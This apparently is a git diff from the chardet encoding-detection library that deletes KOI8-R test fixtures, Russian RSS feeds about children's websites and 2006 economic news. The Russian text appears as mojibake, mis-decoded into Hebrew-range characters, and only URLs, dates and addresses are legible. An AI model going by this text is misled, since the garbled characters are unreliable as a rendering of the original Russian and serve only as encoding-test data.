    - - -קֵֹֹֻּ ֻּֿױ־ ׃־ֿ׳ֱ ׳ םֿ׃ֻ׳ֵ! -13 ֹ 14 ־ֲֿׁׁׂ ׳ כֿ־ֳֵׂװ־ֽֿ ֱֵּ ֵֹֽ־ֹ נ.י.‏ֱֻֿ׳׃ַֻֿֿ ׳׃װױ׀ֱֵװ ׳׃ֵֹֽׂ־ֿ ֹ׳ֵ׃װ־ ֽױֱֻּ״־ ֻּֿױ־ םּ׳ֹ־ פיכף (מֿׂ׳ֵַֹׁ). װֿ - ־ֵ ֲֿ־ֵ ֻֿ־ֳֵׂװ, ֱ "ֻֿ־ֳֵׂװ ִּׁ ֻּֿױ־ֱ ׃ ֵֻֿׂ׃װֽֿׂ". װֿ ־ֵ ׀ֿׂ׃װֿ ִֵװ׃ֵֹֻ ׀ֱַֽֽֿׂׂ, ֱ ױ׳ֱֵֻּװֵּ״־ֵ ׀ױװֵֵ׃װ׳ֹׁ ׳ ֿ׃ֲֿ ֹֽׂ - ֹֽׂ ׃ֶֹֽֿ־ֵֹ׃ֻֿ ֽױֹֻ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/obzor/tix.htm -Mon, 08 Nov 2004 10:43:53 +0300 -otter@kinder.ru -
    - - -םױֵ ֻױֻּֿ "כױֻּֿ״־ ִֽֿ" -ןֱֿׂ׳ֱװֵּ״־ֽֿױ, ֹּֽֽֿױ, ֲִִֿֿׂױ־ֽֿױ, ׃ֱֻֿ־ֽֿױ םױְֵ ֻױֻּֿ "כױֻּֿ״־ ִֽֿ" ֹ׃׀ּֿ־ֵׁװ׃ׁ 10 ֵּװ.
    -נֿ ׃ֵֽױ כױֻּֿ״־ֵֿ כֵּֿֿׂ׳׃װ׳ֿ "כױֻּֿ״־ַֿֿ ֱִֽֿ" ׀ֿ׃װֱ־ֿ׳ֹּֿ:
    -ץ׃װֹֿׂװ״ ׳ ֵ׃װ״ ְֲֵֹּׁ ׀ֱִׂ־ֹֻ ִּׁ ׳׃ֵָ ׃׳ָֹֿ ַֿ׃װֵ, ֲױִ״ װֿ ְ־ֵ (ֹֹּ ֱִײֵ ׃ֿ׳׃ֵֽ ְ־ֵ) ִֵֹּ ֹ ִײֵ־װּ״ֵֽ־, ֹֹּ ׳ֵֹֻּֿ׳ֱֿׂ׃װ־ֵ ֱִֽ ֹ ַֿ׃׀ֱִֿ.
    -ב װֲֿ ׳׃ֵֽ ַֿ׃װֽׁ ֻױֻּֿ״־ַֿֿ ֵֻּֿֿׂ׳׃װ׳ֱ ֲּֿ ֹ־װֵֵׂ׃־ֿ ֹ ׀ֿ־ֱ׳ֱװֵּ״־ֿ, ֵֵׂ־ֿ ֲּֿ ױ׃װֹֿׂװ״ ֱֹּׂ־ֵ ױ׳ֵ׃ֵֵּ־ֹׁ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.museum.ru/M1140 -Mon, 08 Nov 2004 10:43:28 +0300 -otter@kinder.ru -
    - - -מֿ׳ֱׁ ֱַֹׂ ׃ֵֹֹׂ «י׃ֱֻװֵּ״»! -ףֵֹׁׂ ֻֽֿ׀״ְװֵׂ־ָ ַֹׂ «יףכבפולר» ׀ֿ׀ּֿ־ֱֹּ׃״ ־ֿ׳ֿ ַֹֿׂ «יףכבפולר. זֱ־װֱֵׂ». נֲִֿֿ־ֿ ׃׳ֹֽֿ ׀ִֵֵׂ׃װ׳ֵ־־ֱֹֻֽ ֿ־ֱ ׀ֿ׃װֵֿׂ־ֱ ־ֱ ֱֻׂװֹ־ֱָֻ-ֱֱֱִַָֻ. מֿ׳ֱׁ ֱַֹׂ ׀ֿ ׀ֱׂ׳ױ ֽֿײֵװ ֲװ״ ׀ֹׂ־ֱ־ֱ ױֱֵֻׂ־ֵֹֽ ֳֵֹֹֻֻּּֿ «יףכבפולר». ק׃ֵ 54 ֱֻׂװֹ־ ׳׀ּֿ־ֵ־ ׃ ֿ׃ֲֿֿ װֱװֵּ״־ֿ׃װ״ְ ֹ װֱׁװ ֽ־ֿײֵ׃װ׳ֿ ֹ־װֵֵׂ׃־ָ ֱֱִַֻֿ. עֲֵׁװֱֽ 6-12 ֵּװ ׀ִֵׂ׃װֹֿװ ׃ֿ׳ֵֹׂװ״ ׳ֹׂװױֱּ״־ֵֿ ׀ױװֵֵ׃װ׳ֵֹ ׀ֿ װֵֽׂ ױִֹ׳ֹװֵּ״־ֽ ֱֹֽֽׂ – ֻֿ׃ֽֿ׃ױ, ׀ִֿ׳ִֿ־ֽֿױ ֱֳׂ׃װ׳ױ ֹ ׃װֱֹׂ־־ֽֿױ ֱֻֽױ. א־ֵ ַֹֹֻֿׂ ׳ֵ׃ֵּֿ ׀ֿׂ׳ִֵױװ ׳ֵֽׁׂ ֹ ׀ֿ־ֱֻֽֿׁװ׃ׁ ׃ ֲֹֿװֱװֵֹּֽׁ ֱֵֻֿ־ֱ, ױ׃װֿׂ׃װ׳ֽֿ ֹֻֽֿׂ׃ֻֿ׀ֱ ֹ װֵֵּ׃ֻֿ׀ֱ, ֱ װֱֻײֵ ֹױֹװ״ ־ֱ׃װֵֹֿׁ ֱֳׂׂ׃ֵֹֻ ִֿ׃׀ֵָֹ!
    -כֱֻ ֹ ׳׃ֵ ַֹׂ ׃ֵֹֹׂ, «יףכבפולר. זֱ־װֱֵׂ» ׃װֱ־ֵװ ִּׁ ֲֵֵׂ־ֱֻ ־ֵ װּֿ״ֻֿ ֱ־ֱֹֽװֵּ״־ֿ ַֹֿׂ, ־ֿ ֹ ֲױִֵװ ׃׀ֿ׃ֲֿ׃װ׳ֿ׳ֱװ״ ֱׂ׳ֹװְֹ ֱ׃׃ֱֳֹֿװֹ׳־ַֿֿ, ֵַֹּֿ׃ַֻֿֿ ֹ ֱֲֿׂ־ַֿֿ ֵּֽ־ֹׁ. -
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/obzor/obzor_nd_3.htm -Mon, 25 Oct 2004 15:38:21 +0300 -otter@kinder.ru -
    - - -ן־ֹ ֵֽװְֱװ, װֲֿ ױ ־ָֹ ׀ֿׁ׳ֱֹּ׃״ ׃ֵֽ״ׁ… - [נֲִֿֿׂ־ֵֵ...]]]> -http://www.kinder.ru/obzor/dettom18_1.htm -Tue, 12 Oct 2004 14:53:44 +0300 -otter@kinder.ru - - - -חֵֹֿׂ ֽױּ״װ׃ֱֱֵֹּׂ «םֱֵּ־״ֵֹֻ ֲֿֿׂװ» ׃־ֿ׳ֱ ׃ ־ֱֹֽ! -ףֿ׳׃ֵֽ ־ֱִֵ׳־ֿ ׀ֿ װֱֵֵֻּ־ֱּױ ׀ֵּֿׂ ֽױּ״װֹ׀ֱֳֹֹֻּֿ־־ ׃ֱֵֹּׂ «םֱֵּ־״ֵֹֻ ֲֿֿׂװ» ֿװ קקף Worldwide. י ׳ֿװ ױ ֿׂ׃׃ֹ׃ָֹֻ ֲֵׁׂװ ֵ׃װ״ ׳ֽֿֿײ־ֿ׃װ״ ׳־ֿ׳״ ׳׃װֵׂװֹװ״׃ׁ ׃ ְֲֹֹּֽֽ ֵַֹֽֿׁׂ ֹ ֱִײֵ ׀ֹׂ־ׁװ״ ױֱ׃װֵֹ ׳ ָֹ ׀ְֵֹֻּׂ־ָֹׁ ׳ ־ֿ׳ֿ ֻֽֿ׀״ְװֵׂ־ֿ ֵַֹׂ «םֱֵּ־״ֵֹֻ ֲֿֿׂװ». צֹװֵֹּ ׃ֱֻֿ־ֿ ׃װֱׂ־ םֱֵּ־״ָֹֻ ֲֿֿׂװֿ׳ - ׃ֹֽ׀ֱװֹ־ֵ ײֵֵּ־ֵ ֵּֿ׳ֵֹֻ - ױ׃װֱֹׂ׳ְֱװ ֱֱֲ׳־ֵ ׃ֵֿׂ׳־ֿ׳ֱ־ֹׁ, ֻֿ־ֻױׂ׃ ֹ ׳ֹֻװֹֿׂ־.
    -ק ־ֿ׳ֿ ֻֽֿ׀״ְװֵׂ־ֿ ֵַֹׂ ִּׁ ִֵװֵ ֿװ 3-ָ ֵּװ ְ־ַֿֿ ֱַֹֻֿׂ ײִױװ 12 ױ׳ֱֵֻּװֵּ״־ָ ֹֽ־ֹ-ַֹׂ, ־ֱ׀ֱׂ׳ֵּ־־ָ ־ֱ ֱׂ׳ֹװֵֹ ֱ׃׃ֱֳֹֿװֹ׳־ַֿֿ ֹ ֲֹֻֽֿ־ֱװֿׂ־ַֿֿ ֵּֽ־ֹׁ, ױֵֽ־ֹׁ ׃ֹװֱװ״ ֹ ֵֹֿׂ־װֹֿׂ׳ֱװ״׃ׁ ׳ ׀ֿׂ׃װֱׂ־׃װ׳ֵ.
    -יֱַׂ ׳ִַֿ־ֿ ֿװֱֵֹּװ׃ׁ ֿװ ׃ױֵ׃װ׳ױְָֹ ֱ־ֱַּֿֿ׳ ַֹֹֿׂ־ֱּ״־ֽ ֱִֹ־ֽֿ ׀ֵׂ׃ֿ־ֱײֵ, ִׂױײְֲֵּ־ֽ ֹ־װֵֵֶׂ׃ֽֿ, ױ׳ֱֵֻּװֵּ״־ֹֽ ֱֱִ־ֹֹֽׁ ֹ ֱֵֻׂװֹ׳־ֽ ֵֶּֽֿֿׂ־ֵֹֽ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/obzor/obzor_nd_2.htm -Mon, 11 Oct 2004 16:24:13 +0300 -otter@kinder.ru -
    - - -םֿ ֱֵּֽ־״ֹֻ ׀ֿ־ֹ. ‏ֱ׃װ״ װֵׂװ״ׁ. -"הֵװ׃ֵֻֿ װ׳ֵֿׂ׃װ׳ֿ" ֿ׀ױֲֹֻּֿ׳ֱ־ֱ װֵׂװ״ׁ ֹ׃װֹֿׁׂ ֿ ֱֵּֽ־״ָֹֻ ׀ֿ־ֹ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/biblio/poni_3.asp -Mon, 04 Oct 2004 16:34:01 +0300 -otter@kinder.ru -
    - - -־ֳֹֻּֿ׀ִֵֹׁ "כׂױַֿ׃׳ֵװ" -םױּ״װֱִֵֹֹֽ ֱִֹװֵּ״׃װ׳ֿ "מֿ׳ הֹ׃ֻ" ׳׀ױ׃װֹּֿ ־ֿ׳ױְ ׳ֵׂ׃ְֹ ־ֱֵֽ־ֹװֿ ֵֻּװֿׂ־־ֿ ־ֳֹֻּֿ׀ִֵֹֹ "כׂױַֿ׃׳ֵװ". ןֲֹׂ־ֵֿ ֽױּ״װִֵֹֹֽ־ֵֿ ׃׀ֱׂ׳ֿ־ֵֿ ֱִֹ־ֵֹ ׃ִֵֿׂײֹװ ֱֻװױֱּ״־ױְ ֹ־ְֱֳֶֹֽֿׂ ׀ֿ ֹֻֽֿֿׂױ ֻׂױַױ ׳ֿ׀ֿׂ׃ֿ׳.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/obzor/obzor_nd_1.htm -Mon, 04 Oct 2004 16:28:51 +0300 -otter@kinder.ru -
    - - -פֵ׀ּ הֽֿ - [נֲִֿֿׂ־ֵֵ...]]]> -http://www.kinder.ru/redir.asp?id=1438 -Mon, 04 Oct 2004 16:28:31 +0300 -otter@kinder.ru - - -
    -
    - diff --git a/chardet/tests/KOI8-R/money.rin.ru.xml b/chardet/tests/KOI8-R/money.rin.ru.xml deleted file mode 100644 index 24cdf78..0000000 --- a/chardet/tests/KOI8-R/money.rin.ru.xml +++ /dev/null @@ -1,114 +0,0 @@ - - - - - - - -ֻֿ־ֱֹֻֽֿ ֹ ֶֹ־ֱ־׃ -http://money.rin.ru -ֻֿ־ֵֹֽֿ׃ֵֹֻ ֹ ֶֹ־ֱ־׃ֿ׳ֵ ־ֿ׳ֿ׃װֹ -ru-ru -Copyright 2003, Greenline, Kazan, Russia -Wed, 04 Jan 2006 02:20:05 GMT -Wed, 04 Jan 2006 02:20:05 GMT -http://backend.userland.com/rss091 -money@rin.ru -webmaster@dionys.pp.ru - - -ףיפוף ־ֵ ױװ׳ֱִֵֹּׂ ֻ׳ֿװ ־ֱ ֻ׃׀ֿׂװ ֵׂ־ֿ ֹֻׂ ֹ ֿ׃ֵװֿׂ׳ָ -http://money.rin.ru/content/news/?id=106325&from=rss -ףֵֵֻׂװֱֱֹׂװ כֿ־׳ֵ־ֳֹֹ ֿ ֵֽײִױ־ֱִֿׂ־ֿ װַֿֿׂ׳ֵּ ִֹֹֹֻֽ ׳ֱִֹֹֽ ֱֶױ־ ֹ ֶּֿׂ, ־ֱִָֹֹֽֿׁ׃ׁ ׀ִֿ ױַֿֿׂ ֹ׃ֵ־ֿ׳ֵ־ֹׁ (ףיפוף), ֱׁ׳ֹּ ׳ֿ ׳װֿׂ־ֹֻ, װֿ ־ֵ ׃ֽֿײֵװ ױװ׳ִֵֹׂװ״ ֻ׳ֿװ ־ֱ ֻ׃׀ֿׂװ ֵׂ־ֿ ֹֻׂ ֹ ֿ׃ֵװֿׂ׳ָ ־ֱ 2006 ִַֿ ִֿ װֵָ ׀ֿׂ, ׀ֱֻֿ ׃װֱׂ־-׀ֹֿׂ׳ִֹֿװֵֹּ ־ֵ ׀ִֵֿׂ׃װֱ׳ׁװ ׀ּֿ־ױְ ֹ־ְֱֳֶֹֽֿׂ ֿ ׃ֿ׃װֿׁ־ֹֹ ׀ֿ׀ױֳֹֹּׁ ֿ׃ֵװֿׂ׳ָ. - - - -ק׳ִֵֵ־ ֵֽײִױ־ֱִֿׂ־ ֱ׀ֵׂװ ־ֱ ֻ׃׀ֿׂװ ֵׂ־ֿ ֹֻׂ -http://money.rin.ru/content/news/?id=106324&from=rss -ק׳ִֵֵ־ ֵֽײִױ־ֱִֿׂ־ ֱ׀ֵׂװ ־ֱ ֻ׃׀ֿׂװ ֵׂ־ֿ ֹֻׂ. כֱֻ ׀ֱִֵֵֵׂװ "ָֿ םֿ׃ֻ׳", װֿ ֵֵׂ־ֵֹ ׀ֹׂ־ׁװֿ ׳ צֵ־ֵ׳ֵ ־ֱ ֱ׃ֱִֵ־ֹֹ ֵֽײִױ־ֱִֿׂ־ֿ ֱַֿׂ־ֱֳֹֹֹ ׀ֿ װַֿֿׂ׳ֵּ ַֹֹֽֿׁׂ ֹ׃ֵ־ֿ׳ֵ־ֵֹֽ ׳ֱִֹֹֽ ֶּֿׂ ֹ ֱֶױ־ (CITES). - - - -נֱֲֵּֽֿׂ ׀ָֿֿׂײִֵ־ֹׁ ֱַׂ־ֳֹ װױֹׂ׃װֵֹ׃ֹֹֻֽ ֱ׳װֲֿױ׃ֱֹֽ, ׃ִֵּױְֹֹֽ ֹ עֿ׃׃ֹֹ ׳ ו׳ֿׂ׀ױ, ֵֵׂ־ֱ -http://money.rin.ru/content/news/?id=106323&from=rss -נֱֲֵּֽֿׂ ׀ָֿֿׂײִֵ־ֹׁ ֱַׂ־ֳֹ װױֹׂ׃װֵֹ׃ֹֹֻֽ ֱ׳װֲֿױ׃ֱֹֽ, ׃ִֵּױְֹֹֽ ֹ עֿ׃׃ֹֹ ׳ ו׳ֿׂ׀ױ, ֵֵׂ־ֱ. כֱֻ ׃ֲֹֹּֿֿ ׳ עֿ׃׃ֹ׃ֻֽֿ ׃ְֵֿ װױֹׂ־ִױ׃װֹֹׂ, ׃ 1 ׁ־׳ֱׁׂ 2006ַ. ׳ גֵּֿׂױ׃׃ֹֹ ֿװֵֽ־ְׁװ׃ׁ ׳׃ֵ ֵֽ׃װ־ֵ ׃ֲֿׂ ׀ֹׂ ׀ֵֵׂ׃ֵֵ־ֹֹ ֱַׂ־ֳֹ. - - - -נױװֹ־ ׀ִֿ׀ֹ׃ֱּ ֱֻֿ־ ֿ ׳־ֵ׃ֵ־ֹֹ ֵֹֽ־ֵ־ֹ ׳ פֱֽֿײֵ־־ ִֵֻֻֿ׃ עז -http://money.rin.ru/content/news/?id=106322&from=rss -נִֵֵֹׂ־װ עֿ׃׃ֹֹ קֱִֹֹּֽׂ נױװֹ־ ׀ִֿ׀ֹ׃ֱּ ֱִֵֵֶּׂ״־ ֱֻֿ־ "ן ׳־ֵ׃ֵ־ֹֹ ֵֹֽ־ֵ־ֹ ׳ ׃װֱװ״ֹ 147 ֹ 388 פֱֽֿײֵ־־ַֿֿ ִֵֻֻֿ׃ֱ עֿ׃׃ֹ׃ֻֿ זֱֳִֵֵֹֹׂ", ׀ֹׂ־ׁװ חֿ׃ִױֽֿ 23 ֱֲִֵֻׁׂ ֹ ֲִֵֿֿׂ־־ ףֿ׳ֵװֽֿ זֱֳִֵֵֹֹׂ 27 ֱֲִֵֻׁׂ 2005 ֱִַֿ. - - - -"חבתנעןם" נעוכעבפיל נןףפבקכי חבתב מב ץכעבימץ -http://money.rin.ru/content/news/?id=106321&from=rss -ףִֵַֿ־ׁ ־ֱֹ־ֱׁ ׃ 10.00 ׳ ׃׳ֹׁ ׃ ֿװֱֻֽֿ מבכ"מֱֶװֱַֿ ץֱֹֻׂ־" ֿװ ׀ִֿ׀ֹ׃ֱ־ֹׁ ֻֿ־װֱֻׂװֱ ־ֱ ׀ֿ׃װֱ׳ֻױ ֱֱַ ׳ 2006 ִַֿױ, ןבן"חֱ׀ֽֿׂ" ׀ֱֵֻׂׂװֹּֿ ׀ֿ׃װֱ׳ֻױ ֱֱַ ׀ֿװֲֵֹׂװֵּֽׁ ץֱֹֻׂ־. ףֿֿװ׳ֵװ׃װ׳ױְֵֵ ׀ִֵׂױ׀ֵׂײִֵ־ֵֹ ֲּֿ ֱֳֶֹֹּֿ״־ֿ ־ֱ׀ֱׂ׳ֵּ־ֿ ױֱֹֻׂ־׃ֻֿ ׃װֿֿׂ־ֵ 31 ֱֲִֵֻׁׂ 2005 ֱִַֿ. - - - -ק׳ִֿׁװ׃ׁ ־ֿ׳ֵ ׀ֱׂ׳ֱֹּ ׀ֵֵׂ׃ֵֵ־ֹׁ ֱַׂ־ֳֹ ׃ֿ ׃װֱׂ־ֱֹֽ גֱּװֹֹ -http://money.rin.ru/content/news/?id=106320&from=rss -יֵֽ־ֵ־ֹׁ ׳ ׀ִֵֻֿׁׂ ׀ֵֵׂ׃ֵֵ־ֹׁ ֱַׂ־ֳֹ ׃ֿ ׃װֱׂ־ֱֹֽ גֱּװֹֹ ׳׳ִֿׁװ׃ׁ ׃ 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ. כֱֻ ׃ֲֹֹּֿֿ עיב מֿ׳ֿ׃װֹ ׳ םיה עֿ׃׃ֹֹ, ׀ֹׂ װֱׂ־ֹװֵ ֵֵׂ װֵֹׂׂװְֹֿׂ לֹװ׳ ׳ כֱֹּ־ֹ־ֱִַׂ׃ֻױְ ֱֲּֿ׃װ״ ֹ ֹ ֱֲּֿ׃װֹ ׃ 2006 ֱִַֿ ׀ֱֱֵֵֻׂׂװ׃ׁ ִֵ׃װ׳ֵֹ ֱֱַׂ־ֹ־ַֿֿ ׀ֱ׃׀ֿׂװֱ ףףףע. - - - -ף 1 ׁ־׳ֱׁׂ ׳׃װױ׀ֱֵװ ׳ ׃ֹּױ ֱֻֿ־ ֲֿ ֿ׃ֲָֿ ֻֿ־ֵֹֽֿ׃ָֹֻ ֿ־ֱָ -http://money.rin.ru/content/news/?id=106319&from=rss -ף 1 ׁ־׳ֱׁׂ ׳׃װױ׀ֱֵװ ׳ ׃ֹּױ ֱֻֿ־ ֲֿ ֿ׃ֲָֿ ֻֿ־ֵֹֽֿ׃ָֹֻ ֿ־ֱָ (ןת), ׀ִֵׂױ׃ֱֽװֹׂ׳ְֱֹ װֱֽֿײֵ־־ֵ ֹ ־ֱַּֿֿ׳ֵ ּ״ַֿװ ִּׁ ִֵֵֹׂ־װֿ׳ װָֹ ֿ־. ףֱַּֿ׃־ֿ ֱֻֿ־ֱ, ׳ עֿ׃׃ֹֹ ֲױִױװ ׃ֱִֿ־ ןת ִ׳ױָ װֹ׀ֿ׳: ׀ֵּֽֿׂ־־ֿ-׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ֵ ֹ װֵָ־ֹֻֿ-׳־ִֵֵׂ־ֵ׃ֵֹֻ. - - - -זֱִֵֵּׂ״־ֱׁ װֱֽֿײֵ־־ֱׁ ׃ּױײֱֲ ׳ 2005 ִַֿױ -http://money.rin.ru/content/news/?id=106318&from=rss -נֿ׀ּֿ־ֵ־ֵֹ ִִָֿֿ־ֿ ֱ׃װֹ ֱִֵֵֶּׂ״־ַֿֿ ְֲִײֵװֱ ֿ׃װֱ׳ֱּֿ׃״ ִֿ־ֹֽ ֹ ׳ֱײ־ֵָֹ ־ֱ׀ֱׂ׳ֵּ־ֹ ִֵׁװֵּ״־ֿ׃װֹ װֱֽֿײֵ־־ֿ ׃ּױײֲ עֿ׃׃ֹֹ. ק 2005 ַ., ׀ֿ ׀ִֵׂ׳ֱֹׂװֵּ״־ֽ ֱִ־־ֽ, װֱֽֿײֵ־־ֹֽ ֱַֿׂ־ֱֹֽ ׀ֵֵֹׂ׃ֵּ־ֿ ׳ ִִָֿֿ ֱִֵֵֶּׂ״־ַֿֿ ְֲִײֵװֱ 2 װֹֹּּֿׂ־ֱ 102,2 ֱֱִֹֹּּֽׂ ׂױֲֵּ, װֿ ׃ֿ׃װֱ׳ֹּֿ 103% ֿװ ֻֿ־װּֿׂ״־ַֿֿ ֱֱִ־ֹׁ. - - - -לְֲֵ ׀ֱּ־ ׀ֿ ׀ֵּױ -http://money.rin.ru/content/news/?id=106317&from=rss -ף ָֹֽֿֿׂ ־ֱ׃װֵֿׂ־ֵֹֽ ׳׃װְֱֵׂװ מֿ׳ ִַֿ װֱֽֿײֵ־־ֹֹֻ הֱּ״־ֵַֿ קֿ׃װֱֻֿ. הּׁ װַֿֿ ֵ׃װ״ ָֹֿֿׂ ׀ֿ׳ִֿ - ֱֲִֵֻׂ״׃ֹֻ ׀ֱּ־ ׀ֿ ׃ֲֿׂױ װֱֽֿײֵ־־ָ ׀ֱּװֵײֵ ׳׀ּֿ־ֵ־ ֹֹֽ ־ֱ 115 %. ק ֱִֵֵֶּׂ״־ ְֲִײֵװ ׀ֵֵֹׂ׃ֵּ־ֿ 9 ִּֽׂ. - - - -כֿ־׃ױּ״װֱװֹ׳־ ׃ֿ׳ֵװ ֱֵֵׂװ ֹ ־ֲֵּֿ״ֵֹ ׳ֿ׀ֿׂ׃, ֹ ֻֿ־ֳֵ׀װױֱּ״־ֵ ׀ֲֵּֽֿׂ -http://money.rin.ru/content/news/?id=106316&from=rss -נֿ ׃ֲֵֿֿ־ְֹ ׀ֵׂ׃׃-׃ּױײֲ אפץ עז, ִֵֵֿׂ־ֵֿ ֱ׃ֱִֵ־ֵֹ כֿ־׃ױּ״װֱװֹ׳־ַֿֿ ׃ֿ׳ֵװֱ ׀ֿ ֱֲֿׂװֵ ׃ ױֱ׃װ־ֱֹֹֻֽ קה ׀ֹׂ אײ־ֽֿ װֱֽֿײֵ־־ֽֿ ױ׀ֱׂ׳ֵּ־ֹֹ ׃ֿ׃װּֿֿׁ׃״ ׳ ֱֲִֵֵֻׂ ־ֱ ֱֲֵ ןןן "פֱֱַ־ַֿׂ׃ֹֻ ֱ׳װֲֹּֽֿֿ״־ ֱ׳ִֿ". - - - -כֵַֹּּֿׁ זפף עֿ׃׃ֹֹ ֱׂ׃׃ֽֿװֱֵּׂ ׳ֿ׀ֿׂ׃ ׀ִַֿֿװֿ׳ֹֻ נֱּ־ֱ ִֵ׃װ׳ֹ ׀ֿ ֱֱֳֵֹֹֹּׂ כֿ־ֳֵ׀ֳֹֹ ֱׂ׳ֹװֹׁ װֱֽֿײֵ־־ָ ֱַֿׂ־ֿ׳ עֿ׃׃ֹ׃ֻֿ זֱֳִֵֵֹֹׂ -http://money.rin.ru/content/news/?id=106315&from=rss -29 ֱֲִֵֻׁׂ 2005 ֱִַֿ ׃ֿ׃װּֿֿׁ׃״ ֱ׃ֱִֵ־ֵֹ ֵַֹֹֻּּֿ זֱִֵֵּׂ״־ֿ װֱֽֿײֵ־־ֿ ׃ּױײֲ עֿ׃׃ֹֹ, ־ֱ ֻֿװֽֿֿׂ ֲֹּ ֱׂ׃׃ֽֿװֵׂ־ ׳ֿ׀ֿׂ׃ ׳ֱֲֿׂװֹֻ ׀ֱּ־ֱ ֵֽׂ ׀ֿ ֱֱֳֵֹֹֹּׂ כֿ־ֳֵ׀ֳֹֹ ֱׂ׳ֹװֹׁ װֱֽֿײֵ־־ָ ֱַֿׂ־ֿ׳ עֿ׃׃ֹ׃ֻֿ זֱֳִֵֵֹֹׂ ־ֱ 2006-2010 ִַֿ, ֲִֵֿֿׂ־־ֿ נֱׂ׳ֹװֵּ״׃װ׳ֽֿ עֿ׃׃ֹ׃ֻֿ זֱֳִֵֵֹֹׂ 8 ֱֲִֵֻׁׂ ׃.ַ. - - - -ן ׳׃װױ׀ֵּ־ֹֹ ׳ ׃ֹּױ ׀ֿ׃װֱ־ֿ׳ֵּ־ֹׁ נֱׂ׳ֹװֵּ״׃װ׳ֱ עז "ן ֵַׂױֹּֿׂ׳ֱ־ֹֹ ֹֽ׀ֿׂװֱ ַֿ׳ִֹׁ־ ֽֿֿׂײֵ־ֿ ׳ 2006 ִַֿױ" -http://money.rin.ru/content/news/?id=106314&from=rss -ף 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ ׳׃װױ׀ֱֵװ ׳ ׃ֹּױ ׀ֿ׃װֱ־ֿ׳ֵּ־ֵֹ נֱׂ׳ֹװֵּ״׃װ׳ֱ עז N 729 ֿװ 5.12.2005 ַ. "ן ֵַׂױֹּֿׂ׳ֱ־ֹֹ ֹֽ׀ֿׂװֱ ַֿ׳ִֹׁ־ ֽֿֿׂײֵ־ֿ ׳ 2006 ִַֿױ ". ףֱַּֿ׃־ֿ ׀ֿ׃װֱ־ֿ׳ֵּ־ְֹ, ֵֽ־ְׁװ׃ׁ ־ֱֵֹֽ־ֿ׳ֱ־ֹׁ װֵָׂ ׀ִֿ׃ױֲ׀ֳֹֹֿ פמ קה (0202 30 100 3, 0202 30 500 3 ֹ 0202 30 900 3), ׳ ֻֿװֵֿׂ ׳ְֱֵֻּװ׃ׁ ױ׃ּֿ׳ֵֹ ֱֶׂ־ֻֿ-ֱַׂ־ֳֹ ׃װֱׂ־ ׳׳ֱֿ, ֱ װֱֻײֵ ױ׃װֱ־ֱ׳ֹּ׳ְֱװ׃ׁ ־ֿ׳ֵ ׃װֱ׳ֹֻ ׳׳ֿ־ָ ׀ֹּֿ־ ׃ֱַּֿ׃־ֿ ׀ֹּֿׂײֵ־ְֹ. - - - -כ׳ֿװ ־ֱ ֹֽ׀ֿׂװ ֲױִױװ ֹ׃׀ּֿ״ֿ׳ֱ־ ׀ּֿ־ֿ׃װ״ְ -http://money.rin.ru/content/news/?id=106313&from=rss -ף 1 ׁ־׳ֱׁׂ ׳׃װױ׀ֱֵװ ׳ ׃ֹּױ ׀ֿ׃װֱ־ֿ׳ֵּ־ֵֹ נֱׂ׳ֹװֵּ״׃װ׳ֱ עז "ן ִֿ׀ּֿ־ֹװֵּ״־ָ ֱֵָֽׂ ׀ֿ ֵַׂױֹּֿׂ׳ֱ־ְֹ ֹֽ׀ֿׂװֱ ַֿ׳ִֹׁ־, ׃׳ֹ־ֹ־ ֹ ֽׁ׃ֱ ֱִֽֿ־ֵ ׀װֳֹ ׳ 2006 - 2009 ֱִַָֿ" (N 733 ֿװ 5.12.2005 ַ.), ׀ֹׂ׳ֱ־־ֵֿ ֲֵֿ׃׀ֵֹװ״ ׀ּֿ־ֵֿ ֹ׃׀ּֿ״ֿ׳ֱ־ֵֹ ֻ׳ֿװ ־ֱ ֹֽ׀ֿׂװ ׀ֵֵֹׂ׃ֵּ־־ָ ׳ִֹֿ׳ ׀ִֿׂױֳֹֹֻ. - - - -ף־ֹײְֱװ׃ׁ ׃װֱ׳ֹֻ ׀ֹּֿ־ ־ֱ ׃׳ֹ־ֹ־ױ -http://money.rin.ru/content/news/?id=106312&from=rss -ף 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ ׳׃װױ׀ֱֵװ ׳ ׃ֹּױ ׀ֿ׃װֱ־ֿ׳ֵּ־ֵֹ נֱׂ׳ֹװֵּ״׃װ׳ֱ עז "ן ֵַׂױֹּֿׂ׳ֱ־ֹֹ ֹֽ׀ֿׂװֱ ׃׳ֹ־ֹ־ ׳ 2006 ִַֿױ" (N 730 ֿװ 05.12.2005 ַ.), ױ׃װֱ־ֱ׳ֹּ׳ְֱֵֵ ׃ױֱֽֽׂ־ ֲֵֽֿ ׳׳ֱֿ ׳ עֿ׃׃ְֹ ׃׳ֹ־ֹ־ ׳ ֱֵֵֽׂׂ 476,1 װ׃. - - - -ף׀ֹֿׂװ״ ֱַֽֿׂװ־ֿ ֹ ׀ֿ ִֵּױ -http://money.rin.ru/content/news/?id=106311&from=rss -ף 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ ׳׃װױ׀ֹװ ׳ ׃ֹּױ ׀ֱֹֻׂ זֱִֵֵּׂ״־ֿ װֱֽֿײֵ־־ֿ ׃ּױײֲ "ןֲ ֿ׃׀ֱֹׂ׳ֱ־ֹֹ װֱֽֿײֵ־־ֹֽ ֱַֿׂ־ֱֹֽ ׳׃װױ׀ֹ׳ָֹ ׳ ֱֻֿ־־ױְ ׃ֹּױ ׃ױֲִֵ־ָ ֱֻװֿ׳ ֱֲֹׂװֱׂײ־ָ ׃ױִֿ׳ ׳ ׀ִֵֻֿׁׂ ־ֱֱִֿׂ" (N 1080 ֿװ 17 ־ֲֿׁׁׂ 2005 ֱִַֿ). - - - - \ No newline at end of file diff --git a/chardet/tests/KOI8-R/music.peeps.ru.xml b/chardet/tests/KOI8-R/music.peeps.ru.xml deleted file mode 100644 index 5661a56..0000000 --- a/chardet/tests/KOI8-R/music.peeps.ru.xml +++ /dev/null 